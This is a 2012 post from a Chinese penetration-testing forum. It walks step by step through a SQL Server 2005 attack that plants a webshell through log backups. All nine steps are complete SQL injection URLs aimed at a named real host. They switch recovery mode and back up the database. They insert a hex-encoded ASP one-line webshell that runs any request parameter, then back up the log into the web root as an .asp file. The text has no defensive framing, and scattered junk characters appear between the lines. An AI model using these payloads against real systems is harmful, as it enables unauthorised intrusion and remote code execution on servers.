中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

---

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
. O" Y6 ]3 z) ^" L# @; }  l" a( uhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--

' P* d2 O, F  D7 ?" K第二步：
- q  r% p2 V/ I; S/ nhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
: i" V! p- b+ K+ E4 ?6 N; [
第三步
1 o# Y$ N" z5 Vhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
. ]+ f; E0 i( b, h5 o# j, r  c
/ Q. _; `+ w  s7 S$ s8 O9 H2 _第四步
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--

第五步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第六步
% A1 ], V. \9 t: W0 g$ G# {http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--

8 E  t  _2 s6 D7 m9 w第七步
$ s0 Y5 Z6 r3 c. Y4 Z2 Rhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

0 O' Y6 R. ~# j第八步
6 x2 j; i( f1 J; Mhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--

3 e2 m# R) H3 v' p4 m: v  e第九步
7 y9 m/ F' Z& V8 ~( D( Thttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
, p- w% I' I" O

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2